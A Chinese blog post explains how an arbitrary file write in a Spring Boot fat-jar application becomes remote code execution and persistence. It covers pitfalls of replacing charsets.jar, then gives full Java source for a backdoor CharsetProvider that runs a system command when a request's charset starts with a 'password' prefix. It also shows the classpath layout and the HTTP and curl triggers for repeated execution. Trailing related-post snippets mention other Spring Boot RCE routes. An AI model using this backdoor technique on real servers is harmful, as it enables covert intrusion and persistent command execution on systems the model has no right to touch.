springboot 写文件rce踩雷

原创 已于 2024-12-26 10:23:33 修改 · 835 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#spring boot #后端 #java

于 2024-12-26 01:47:47 首次发布

项目引用:GitHub - LandGrey/spring-boot-upload-file-lead-to-rce-tricks: spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧

之前就知道spring框架可以这样写文件实现rce,但是当时也没操作过,最近想写个权限维持的工具,才知道里面有很多坑,下面单对写charsets.jar文件实现rce做讨论(charsets.jar文件使用的是GitHub项目中编译好的文件)

spring环境触发恶意代码的数据包

GET / HTTP/1.1
Accept: text/html;charset=GBK

坑点一

Java应用中的函数得没有使用Charset.forName("GBK")类似的代码,这样charsets.jar文件不会在应用运行时被加载到jvm中,才能在后面顺利替换掉charsets.jar来实现恶意代码运行

坑点二

系统必须是Linux系统,windows系统由于在Java应用启动时,就会自动加载charsets.jar,导致了后面替换jar包没用,除非是简单粗暴的直接修改ExtendedCharsets ,在其中添加恶意代码,这样虽然windows的Java应用在修改编码调用这个函数的时候会触发恶意代码,但是如果直接修改这个类,太粗暴了,会直接影响到系统中所有的Java应用,字符编码也会乱掉,严重的可能还会导致Java应用崩溃掉。LandGrey的GitHub项目中的charsets.jar也只是修改了下面的一个IBM33722 的类文件

坑点三

系统必须是zh_CN.gbk字符集,这样使用数据包触发时,才会加载charsets.jar

坑点四

只能主动触发一次charsets.jar ,如果恶意代码没有被触发,那继续发数据包也没用了,因为jar包已经被加载了

其他利用

写文件做rce的利用除了上面的写charsets.jar文件外,还有一个自己利用spi机制来编写一个恶意provider,然后上传到系统的classpath文件下,一般是jdk_home/jre/classes

实现

编写CharsetEvil.java

package sun.nio.cs.evil;

import java.io.IOException;
import java.nio.charset.Charset;
import java.nio.charset.spi.CharsetProvider;
import java.util.HashSet;
import java.util.Iterator;

public class CharsetEvil extends CharsetProvider{

    @Override
    public Iterator<Charset> charsets() {
        // TODO Auto-generated method stub
        return new HashSet<Charset>().iterator();
    }

    @Override
    public Charset charsetForName(String charsetName) {
        // TODO Auto-generated method stub
        if(charsetName.startsWith("evil")) {    //指定后门密码
            try {
                Runtime.getRuntime().exec("cmd /c calc");
            } catch (IOException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
        }
        return Charset.forName("UTF-8");
    }
    
}

使用javac编译后,在jdk_home/jre/classes目录下建立这样的目录结构

.
├── sun
	└── nio
		└── cs
			└── evilCharsetEvil.class
└── META-INF
    └── services
        └── java.nio.charset.spi.CharsetProvider

其中services目录下的文件名字是spi继承的类名,文件内容是sun.nio.cs.evil.CharsetEvil 也就是恶意类名

触发

curl -X GET "<http://127.0.0.1:8080/>" -H "Accept: text/html;Charset=Evil"

GET / HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json;charset=evil;

触发的Accept: application/json;charset=evil; 字段虽然说相同的charset 只能使用一次,但是由于代码判定的是以evil开头,所以也可以使用Accept: application/json;charset=evilxx; 进行重复多次运行恶意代码

总结

其实对比下两种利用手法,由于jdk_home/jre/classes目录不存在,需要自己创建的原因,很多人还是倾向于jar包做维权的手段,但是我上面总结了很多坑点,光是系统必须是zh_CN.gbk字符集就说明了利用条件非常苛刻了,在不用说Java应用中的函数得没有使用Charset.forName("GBK")类似的代码,而且即使上传成功,利用成功了,在国内现在的攻防场景的原因,会对应用系统做出一些破坏,客户肯定是不允许的,所以我在这里是倾向于第二种利用手法的

参考链接:

https://xz.aliyun.com/t/16831

从Spring Boot FatJar文件写漏洞的一次实践 - admin-神风 - 博客园

https://threedr3am.github.io/2021/04/14/JDK8任意文件写场景下的SpringBoot RCE/

anthony77777
关注
Springboot之actuator配置不当漏洞RCE(jolokia)
墨痕诉清风的博客
10-25 5055
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
Spring-boot Actuator H2 RCE复现
1
09-07 2176
Spring Boot Actuator H2 RCE复现
Spring FatJar写文RCE分析
2401_83799022的博客
01-25 1109
目录下的所有 jar,以及JAVA HOME下系统classpath的jar,无法在其运行的时候往 app.jar classpath 中增加文。随便选一个sun.nio.cs.ext下的类进行覆盖就OK,为了保持最小体积,抛弃其他类(需要保留ExtendedCharsets类,不然无法加载其他类)。MiscCodec是老朋友了,直接看到deserialze方法,如果clazz是Charset.class的话,会调用Charset.forName。而且还得找系统启动后没有进行过。
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文上传功能 (默认上传到 /tmp/ 目录,
2025最新Spring全家桶各类RCE漏洞剖析,全面掌握RCE漏洞,看这一篇就够了
最新发布
m0_71745754的博客
07-31 945
Spring发展到现在,全家桶所包含的内容非常庞大,这里主要介绍其中关键的5个部分,分别是spring framework、 springbootspring cloud、spring security、spring mvc。其中的spring framework就是大家常常提到的spring, 这是所有spring内容最基本的底层架构,其包含spring mvc、springbootspring core、IOC和AOP等等。
SpringBoot SpEL RCE漏洞分析
12-07 2050
SpringBoot SpEL RCE 前言最近一段时间学习Spring系列的漏洞,跟着Github上的资源学习
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
weixin_42786460的博客
09-17 1702
SpringBoot远程代码执行SpEL RCE漏洞反序列化复现
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 3630
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
springboot rce
09-12
2. 安全配置:在应用程序的配置文中,确保采取了适当的安全措施,如禁用不必要的功能、限制用户输入等。 3. 输入验证:对于从用户获取的任何输入,都需要进行有效的验证和过滤,以防止恶意代码注入。 4. 访问...
Spring Boot Actuator RCE
weixin_30693683的博客
03-16 852
来看一下IDEA如何调试Spring Boot 先在https://github.com/artsploit/actuator-testbed下载源码 如下命令就能通过maven环境启动 mvn install mvn spring-boot:run 需要但开启调试模式,在pom.xml文加入如下配置: <configuration> ...
Spring Boot RCE到内存马探索
小王的储物间
02-13 1467
SpringBootVulExploit是Spring Boot漏洞Checklist,但在真正的环境中进行漏洞利用还是有一段距离的,因此衍生出了SpringBootExploit工具。本文是对该Checklist到内存马探索之路的记录。可能是大多数人没有需求,或者是安全研究员没有打红队的原因。导致利用方式普遍都是以弹计算器为最终结果,不能进一步深入利用,导致很多漏洞不了了之。目前网上普遍分析文章,复现文章都是以弹计算器结束,但这其实与实战化的需求还存在着很远的一段路程。
Springboot远程代码执行(spring cloud SnakeYAML RCE
qq_50854662的博客
06-27 1146
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
springboot-spel-rce复现
lastwinn的博客
07-04 1266
记录自己的所学以及理解。
实战案例:记一次利用SpringBoot相关RCE-bug拿下某数字化平台系统
hackzkaq的博客
01-17 490
在一次众测项目中,对某大型企业的某套数字化平台系统进行测试,前端功能简单,就一个登录页面,也没有测试账号,由于给的测试时间不多,倒腾了半天没有发现有价值的漏洞,在快要结束的时候,试了几个报错,发现是Spring Boot框架的,仿佛间看到曙光,后续也顺利拿下RCE。通过本文的分享,希望能给大家获取到一些思路和帮助~~访问http://xx.xx.xx.xx/,打开就是一个某数字化平台登录页面,尝试了登录框可能存在的各类漏洞问题,如弱口令,用户名枚举,万能密码登录,登录验证绕过,任意密码重置等等,无果。
springboot实现文上传
m0_55045698的博客
03-22 4464
我本地运行出来确实是我项目的根目录,但是上到服务器,打出来的就是/,也就是linux的根目录,因此我决定以"/home/ec2-user/www/wwwroot/online_exam" 这种定值的方式取代System.getProperty("user.dir"),否则我的fileStorage目录就会建立在/这个目录下面,然后根据url访问就失效了。第三点是我添加了一个附表,防止重复照片的存入消耗内存,毕竟不是存在三方文系统上,自己买的系统还是省着点,而且还可以提升一丢丢的效率。
【组攻击链】Spring全家桶各类RCE漏洞浅析
further_eye的博客
12-07 3448
尽管近期没有出现相关漏洞,但这些高风险漏洞依然不可忽视。本文涉及漏洞大多不需要复杂的配置就可以直接攻击成功,执行任意代码,危害较大。故开发者在使用Spring进行开发的过程中,一定要关注其历史风险点,规避高危漏洞,减少修改不必要的配置信息。
SpringBoot eureka xstream deserialization RCE
LiBai'S BLOG
03-01 3791
利用条 可以 POST 请求目标网站的 /env 接口设置属性 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖) 目标使用的 eureka-client < 1.8.7(通常包含在 spring-cloud-starter-netflix-eureka-client 依赖中) 目标可以请求攻击者的 HTTP 服务器(请求可出外网) 利用方法 步骤一:架设响应恶意 XStream payload 的网站 提供一
springboot漏洞(Spring RCE 0day)CVE-2022-22965
GDKbb的博客
03-30 7544
一·漏洞影响排查方法 (一).JDK版本号排查 在业务系统的运行服务器上,执行“java -version”命令查看运行的JDK版本,如果版本号小于等于8,则不受漏洞影响 (二).Spring框架使用情况排查 1.如果业务系统项目以war包形式部署,按照如下步骤进行判断。 ⑴解压war包:将war文的后缀修改成.zip ,解压zip文 ⑵在解压缩目录下搜索是否存在 spring-beans-.jar 格式的jar文(例如spring-beans-5.3.16.jar),如存在则说明业务系统使用了spr
SpringBoot远程代码执行(whitelabel error page SpEL RCE
qq_50854662的博客
06-27 460
Spring-boot远程代码执行系列(whitelabel error page SpEL RCE
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值